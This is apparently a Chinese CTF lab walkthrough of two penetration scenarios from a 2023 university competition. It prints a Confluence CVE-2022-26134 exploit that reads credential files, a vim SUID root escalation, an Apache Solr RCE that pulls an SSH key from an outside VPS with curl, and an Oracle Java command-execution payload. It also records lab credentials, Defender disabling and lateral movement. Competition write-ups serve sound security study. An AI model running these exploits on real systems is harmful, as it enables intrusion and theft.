长亭百川云 - 文章详情

原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(下)

SecIN技术平台

87

2024-07-13

引言

第八届上海市大学生网络安全大赛

暨“磐石行动”2023(首届)大学生网络安全邀请赛

—— CTF比赛

2023.5.20 9:00 - 21:00

—— 漏洞挖掘比赛

2023.5.21 00:00 - 2023.5.22 24:00

由于文章写得有点长,干脆拆分成了上下篇,上篇主要写了下场景1和场景3的

那这个下篇接着来记录一下场景2和场景4的漏洞挖掘过程。

既然是Workthrough,那文中必然有不少走错路的时候,说不定还有写得不对的地方,师傅们看的时候就当听故事好了(哈哈)

漏洞挖掘场景2【1/4】

(icmp) Target 10.103.252.84   is alive

http://10.103.252.84/

http://10.103.252.84:8090/

基于 Atlassian Confluence 7.14.2 技术构建

CVE-2022-26134 Confluence OGNL RCE 漏洞分析

https://www.anquanke.com/post/id/274026

天下大木头师傅的 Confluence CVE-2022-26134 漏洞分析

http://wjlshare.com/archives/1755

Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability

https://github.com/nxtexploit/CVE-2022-26134

$ python CVE-2022-26134.py http://10.103.252.84:8090/ id

flag在/root/目录下,当前用户权限,找个地方提权,mysql?

数据库的配置文件

$ python CVE-2022-26134.py http://10.103.252.84:8090/ "cat /var/atlassian/application-data/confluence/confluence.cfg.xml"

数据库 3306

confluence

Confluence.123

5.7.42

好像是 mysql 权限,也没 root

还得提权?参考 confluence 忘记密码

https://www.jianshu.com/p/7cc8ea59578a

cwd_user 表

admin

修改密码为 Ab123456,登录

还得提权?

shell 弹不回来好难受,只能正向打啊啊啊

可以弹公网

但是不如直接写私钥然后 ssh 登录

python CVE-2022-26134.py http://10.103.187.168:8090/ "mkdir /home/confluence/.ssh/"

Sudo version 1.8.23

Sudoers policy plugin version 1.8.23

Sudoers file grammar version 46

Sudoers I/O plugin version 1.8.23

看看sudo提权或者CVE-2021-4034 pwnkit那个

看起来都不行

入口 flag1 192.168.0.12

vim 有 suid 权限

vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
sh-4.2# cat /root/flag

内网

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1450

192.168.0.55 win

2W2mg^v6B6UJNR@Svs

用上面的连接信息连

3389 是不是没开不让连啊。。

是不是哪里锅了

噢,还有 3306 啊

MySQL 5.5.53

直接 udf 提权

-- select @@basedir;

系统权限好啊!

  C 

mimikatz 被杀了。。
MsMpEng.exe <=> Microsoft Security Essentials

直接加个账号连上去,然后关掉 win defender,然后 dump

啥也没有啊

不过Administrator的桌面上有个Redis客户端,估计连的是192.168.0.33:6379这个

感觉这台机器上哪里存了密码

赛后看了其他队wp发现要解本机的NTLM hash然后拿去cmd5解密得到明文密码,用这个密码就能登录redis然后进一步弹shell

好吧,摸了

漏洞挖掘场景4【2/3】

10.103.31.38:22 open

flag1 192.168.33.39 apache_solr

https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template/tree/master

$ python apache_solr_exec.py 10.103.31.38 8983
python apache_solr_exec.py  10.103.32.51 8983 "curl vpsip:port/authorized_keys -o /root/.ssh/authorized_keys"

直接加个 key 然后 ssh 上去

内网 192.168.33

扫内网

(icmp) Target 192.168.33.39   is alive

起个代理到内网

flag2 192.168.33.172 FOUR\SERVER Oracle db

history

sqlplus 

system/Zr6kJG2U3m3A7BG@192.168.1.100:1521/orcl

192.168.33.172:1521

select * from v$version;

命令执行 DBMS_XMLQUERY

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

执行命令:

select LinxRUNCMD('whoami') from dual;

发现不能有空格。。

https://github.com/jas502n/oracleShell

这工具感觉只支持 Linux 的命令执行,还得手动读文件。。

数据库读取文件方式总结

https://uuzdaisuki.com/2020/07/10/数据库读取文件方式总结/

create or replace directory user_dir as 'C:\Users\Administrator\Desktop\';

小结

于是通宵打了两天漏洞渗透靶场,累死了

感觉Windows攻防这一块喵喵还不大熟悉,后面有机会有空的话再来补一补.jpg (咕咕咕

吐槽一下怎么不是所有机器都有flag,好不容易日了一台机器下来,上去发现啥都没有,好亏啊!

然后又想到去年线下打鹏城杯那个靶场,靶机里数据库web服务root下好几个地方放了flag,虽然容易漏但是至少拿下机器shell有flag的反馈还是挺乐的,虽然打得也挺累的就是了。

还有个挺坑的地方是,他靶机的DNS都配的是192.168下的,但是那个IP又连不通,于是如果反弹shell或者下载带域名的URL就解析不出来了,整的喵喵还以为不通外网,后来直接试IP发现能访问才猜到是这样的。

而且VPN网段不能弹shell回来,中间的路由直接丢了,而且通过VPN访问也是走的中间的机器跳过去的

(不过这漏洞挖掘的比赛也好卷啊!)

喵喵一个人拿了1k分,也就是拿了5个flag,人麻了

可惜最后CTF和漏洞挖掘居然是按照7:3的比例把分数加起来,感觉亏死了!!!

于是连着打了三天,累累,呜呜

不过说来这应该是喵喵最后一次打上海市赛了吧(喵呜喵呜喵)

(溜了溜了喵)

往期推荐

原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(上)

原创 | 深入解析pe结构(上)

原创 | 深入解析pe结构(下)

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2